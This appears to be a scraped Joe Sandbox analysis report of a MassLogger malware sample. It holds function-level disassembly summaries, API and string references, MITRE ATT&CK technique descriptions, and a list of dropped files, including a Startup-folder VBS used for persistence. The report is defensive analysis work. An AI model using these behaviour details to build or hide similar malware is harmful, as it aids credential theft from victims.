String ID: d}m
API String ID: 2932060187-420323504
Opcode ID: 959bb4b3c9214d93865fd828608c7d50c912dfab8181389537b6d740efbf13c6
Instruction ID: 9156a1a61c33ed78ddfe27de810b4217212ecc2bc153dcff4bd63164769e3319
Opcode Fuzzy Hash: 959bb4b3c9214d93865fd828608c7d50c912dfab8181389537b6d740efbf13c6
Instruction Fuzzy Hash: C4111E719007089FC710DFAAD88489AFBF9FF18310B50862FE58AD7611E771AA44CF95

Function 00684F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00684F46
_wcscmp.LIBCMT ref: 00684F58

Strings

#32770, xrefs: 00684F52

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 30a330b9efe1b6a00d4a29e77fad20ef33a5594af991a2327a0122c07f42562e
Instruction ID: 4a24a3e69be510ebccd63815c01ef525dfdaa460831c765d1f7784cb8dbd6a18
Opcode Fuzzy Hash: 30a330b9efe1b6a00d4a29e77fad20ef33a5594af991a2327a0122c07f42562e
Instruction Fuzzy Hash: F9E06832A003382BD320AB99EC49FA7F7ACEB91B70F00012BFD00D3140D960AA058BE0

Function 0065B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0065B314: _memset.LIBCMT ref: 0065B321

Part of subcall function 00640940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0065B2F0,?,?,?,0062100A), ref: 00640945

IsDebuggerPresent.KERNEL32(?,?,?,0062100A), ref: 0065B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0062100A), ref: 0065B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0065B2FE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 87ca38745cdbe298f1bcdd8fc7a2cf752774b73e58b68c5e87a829c37c36c346
Instruction ID: 8242670fbfd2121511c68b342edf3942c3ccc49de3c9fae9b4de2d7dc223b49c
Opcode Fuzzy Hash: 87ca38745cdbe298f1bcdd8fc7a2cf752774b73e58b68c5e87a829c37c36c346
Instruction Fuzzy Hash: 0CE092702007118FE760EF68E4047427BE6EF04305F049A6CE856D7341E7B4E448CFA1

Function 00677C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00677C82

Part of subcall function 00643358: _doexit.LIBCMT ref: 00643362

Strings

AutoIt, xrefs: 00677C76
Error allocating memory., xrefs: 00677C7B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 276ecdbd5d5c1c9a2f8dd8946c1f23e0c34393378dfe61c2ce724c124606eaac
Instruction ID: 2f8854d48111fca8a88613a39d5d971f46f5fa9c50eb1bb422b01ba71aa7334c
Opcode Fuzzy Hash: 276ecdbd5d5c1c9a2f8dd8946c1f23e0c34393378dfe61c2ce724c124606eaac
Instruction Fuzzy Hash: 91D05B323C436836D35533A56D07FCA794B4F05B56F05482AFB08596D38DD555D042ED

Function 00661935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00661775

Part of subcall function 0069BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0066195E,?), ref: 0069BFFE
Part of subcall function 0069BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0069C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0066196D

Strings

WIN_XPe, xrefs: 00661788

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: b486701f419c49a85f1d0485c621a17a65cfabaa1415a9d2e8cd60bce74f535a
Instruction ID: 514ddf57a3d1b859f20ce38195d4ae392a22732c46e5cb512d54789a69a8df17
Opcode Fuzzy Hash: b486701f419c49a85f1d0485c621a17a65cfabaa1415a9d2e8cd60bce74f535a
Instruction Fuzzy Hash: 2FF0ED71800109DFDB15DB91D9C4AECBBFAFB19301F581096E102AB190D7716F85DF61

Function 006A5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006A596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006A5981

Part of subcall function 00685244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006852BC

Strings

Shell_TrayWnd, xrefs: 006A5967

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9daa920585744d24d97d8cd0382e286b116078a5b93e162ef4baf9ca61cb4f47
Instruction ID: dd04382ea6aa279e961acd185fd9d5a93d9520e3a69a0c05f1dfde33c69f3b3d
Opcode Fuzzy Hash: 9daa920585744d24d97d8cd0382e286b116078a5b93e162ef4baf9ca61cb4f47
Instruction Fuzzy Hash: 28D0C935784311BAE7A4BBB0AC5FF966A56AB11B50F011829B24AAA1D0CDE0A800CA54

Function 006A5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006A59AE
PostMessageW.USER32(00000000), ref: 006A59B5

Part of subcall function 00685244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006852BC

Strings

Shell_TrayWnd, xrefs: 006A59A7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ba39ba33d5cd76f0c32422de5fdef4cba51d841b84b478e482f55dd494c867eb
Instruction ID: 070b916208ca517ad58bbd676b25c46f0e26fba5524808b15f95ee0ed24abb51
Opcode Fuzzy Hash: ba39ba33d5cd76f0c32422de5fdef4cba51d841b84b478e482f55dd494c867eb
Instruction Fuzzy Hash: 98D0C9317803117AE7A4BBB0AC4FF966656AB16B50F011829B246AA1D0CDE0A800CA59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yqfze5TKW7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut20FF.tmp

C:\Users\user\AppData\Local\Temp\aut2267.tmp

C:\Users\user\AppData\Local\Temp\autEEF2.tmp

C:\Users\user\AppData\Local\Temp\autEF51.tmp

C:\Users\user\AppData\Local\Temp\autF2BB.tmp

C:\Users\user\AppData\Local\Temp\autF3D5.tmp

C:\Users\user\AppData\Local\Temp\beeish

C:\Users\user\AppData\Local\Temp\bothsidedness

C:\Users\user\AppData\Local\underbalance\porcelainization.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Static File Info

Windows Analysis Report
yqfze5TKW7.exe

Function 00623B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 006249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00624E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00689155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00623015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00623041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0062708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00623633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00623A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre